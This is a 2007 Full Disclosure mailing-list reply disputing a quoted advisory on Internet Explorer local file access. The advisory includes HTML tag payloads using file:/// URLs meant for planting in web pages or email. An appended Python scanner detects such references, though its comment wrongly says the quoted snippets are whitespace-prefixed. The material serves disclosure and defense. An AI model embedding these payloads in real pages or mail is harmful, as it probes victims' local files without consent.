Full Disclosure mailing list archives
Re: Microsoft Internet Explorer Local File Accesses Vulnerability
From: "pdp (architect)" <pdp.gnucitizen () googlemail com>
Date: Tue, 20 Feb 2007 09:57:30 +0000
hi Rajesh,

Maybe it is too early in the morning in the UK and that's why I may be acting stupid, but how come this is a vulnerability? For sure you can open files from the file system by using various HTML elements, but can you really read their content? I don't think so.

Firefox has done a good job in restricting access to local files if they are called from remote locations such as http and https. This rule, however, can be circumvented in a number of ways. IE does perform some of these checks, although I have tested the POC you provided and I cannot see it working. I am running XP SP2, no lockdowns whatsoever.

I see how this trick can be used to identify the operating system version but, again, this is not a new thing. You can do similar stuff with the res:// protocol. In fact you can use this protocol to identify currently installed applications, which I believe is pretty cool.

So, can you explain why this is a hole and how it can be used by attackers? :)

Thanks man,
All the best

On 2/19/07, Rajesh Sethumadhavan <rajesh.sethumadhavan () yahoo com> wrote:
Microsoft Internet Explorer Local File Accesses Vulnerability
#####################################################################
XDisclose Advisory       : XD100099
Vulnerability Discovered : February 10th 07
Advisory Released        : February 20th 07
Credit                   : Rajesh Sethumadhavan
Class                    : Local File Accesses
Severity                 : Critical
Solution Status          : Unpatched
Vendor                   : Microsoft Corporation
Affected applications    : Microsoft Internet Explorer
Affected version         : Microsoft Internet Explorer 6 confirmed (other versions may also be affected)
Affected Platform        : Windows XP Professional SP0, SP1, SP2
                           Windows Home Edition SP0, SP1, SP2
                           Windows 2003
#####################################################################

Overview:
Microsoft Internet Explorer is the default browser bundled with all versions of the Microsoft Windows operating system.

Description:
A vulnerability has been identified in Microsoft Internet Explorer (default installation) on Windows XP Service Pack 2 which could be exploited by malicious users to obtain victims' local files. This flaw is due to an error in the way Microsoft Internet Explorer handles different HTML tags, which could be exploited by a malicious remote user to obtain sensitive local files from the victim's computer.

Vulnerability Insight:
Microsoft Windows explorer is not handling various HTML tags like "img", "script", "embed", "object", "param", "style", "bgsound", "body", "input" (other tags may also be vulnerable). By using the file protocol along with the above tags it is possible to access victims' local files.
a) Embed Tag Local File Access:
---------------------------------------------------------------------
<EMBED SRC="file:///C:/test.pdf" HEIGHT=600 WIDTH=1440></EMBED>
---------------------------------------------------------------------

b) Object & Param Tag Local File Access:
---------------------------------------------------------------------
<object type="audio/x-mid" data="file:///C:/test.mid" width="200" height="20">
<param name="src" value="file:///C:/test.mid">
<param name="autoStart" value="true">
<param name="autoStart" value="0">
</object>
---------------------------------------------------------------------

c) Body Tag Local File Access:
---------------------------------------------------------------------
<body background="file:///C:/test.gif" onload="alert('loading body bgrd success')" onerror="alert('loading body bgrd error')">
---------------------------------------------------------------------

d) Style Tag Local File Access:
---------------------------------------------------------------------
<STYLE type="text/css">BODY{background:url("file:///C:/test.gif")}</STYLE>
---------------------------------------------------------------------

e) Bgsound Tag Local File Access:
---------------------------------------------------------------------
<bgsound src="file:///C:/test.mid" id="soundeffect" loop=1 autostart="true"/>
---------------------------------------------------------------------

f) Input Tag Local File Access:
---------------------------------------------------------------------
<form>
<input type="image" src="file:///C:/test.gif" onload="alert('loading input success')" onerror="alert('loading input error')">
</form>
---------------------------------------------------------------------

g) Image Tag Local File Access:
---------------------------------------------------------------------
<img src="file:///C:/test.jpg" onload="alert('loading image success')" onerror="alert('loading image error')">
---------------------------------------------------------------------

h) Script Tag Local File Access:
---------------------------------------------------------------------
<script src="file:///C:/test.js"></script>
---------------------------------------------------------------------

Exploitation method:
- Create a web page or an HTML mail with the vulnerable code.
- When the victim opens the mail or visits the vulnerable site it is possible to access his local files.

Demonstration:
Note: The demonstration will try to access a few default images and wave files.
- Visit the POC.
- If a vulnerable Internet Explorer is used it will show your local sample images and give a proper alert.

Solution:
No solution

Screenshot:
http://www.xdisclose.com/images/xdiscloselocalie.jpg

Proof Of Concept:
http://www.xdisclose.com/poc/xdiscloselocalie.html

Impact:
A remote user can get access to the victim's local system files. Scope of impact is limited to system level.

Original Advisory:
http://www.xdisclose.com/XD100099.txt

Credits:
Rajesh Sethumadhavan has been credited with the discovery of this vulnerability.

Disclaimer:
This entire document is strictly for educational, testing and demonstration purposes only. Modification, use and/or publishing of this information is entirely at your own risk. The exploit code is to be used in your testing environment only. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
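A gateway-side check for the pattern the quoted advisory describes, added here as an example and not code from either poster: it parses HTML with the Python standard library and flags the advisory's tags (img, script, embed, object, param, style, bgsound, body, input) whenever their URL-bearing attribute, or a CSS url() inside a style block, points at a file: URL, including the whitespace-prefixed forms that appear in the advisory's snippets. The sample document is constructed from those snippets plus one benign https image, which the scanner must not flag.

```python
import re
from html.parser import HTMLParser

# Tag -> attribute that makes IE fetch a URL; the tag list is the advisory's.
URL_ATTRS = {
    "img": "src", "script": "src", "embed": "src", "object": "data",
    "param": "value", "bgsound": "src", "body": "background", "input": "src",
}
# url(...) inside a <style> block, tolerating quotes and stray whitespace.
CSS_URL = re.compile(r"url\(\s*['\"]?\s*(file:[^'\")\s]+)", re.I)

class FileRefScanner(HTMLParser):
    # Collects (tag, attribute, url) for every file: reference in a document.
    def __init__(self):
        super().__init__()
        self.hits, self._in_style = [], False

    def handle_starttag(self, tag, attrs):
        self._in_style = tag == "style"
        value = dict(attrs).get(URL_ATTRS.get(tag, ""), "") or ""
        if value.strip().lower().startswith("file:"):  # tolerate " file:///..."
            self.hits.append((tag, URL_ATTRS[tag], value.strip()))

    def handle_data(self, data):
        if self._in_style:  # <style> content arrives as raw CDATA text
            self.hits.extend(("style", "url()", u) for u in CSS_URL.findall(data))

    def handle_endtag(self, tag):
        self._in_style = False

def scan_html(doc):
    # Return the list of file: references found in an HTML document.
    scanner = FileRefScanner()
    scanner.feed(doc)
    scanner.close()
    return scanner.hits

# Constructed sample: the advisory's snippets plus one benign https image.
SAMPLE = """<body background="file:///C:/test.gif" onload="alert('loading body bgrd success')">
<img src="https://example.test/logo.png">
<img src="file:///C:/test.jpg" onload="alert('loading image success')">
<object type="audio/x-mid" data=" file:///C:/test.mid"><param name="src" value="file:///C:/test.mid">
<param name="autoStart" value="true"></object>
<style type="text/css">BODY{background:url(" file:///C:/test.gif")}</style>
<bgsound src="file:///C:/test.mid" loop=1 autostart= "true"/>
<script src="file:///C:/test.js"></script ></body>"""

if __name__ == "__main__":
    for tag, attr, url in scan_html(SAMPLE):
        print(f"{tag}[{attr}] -> {url}")
```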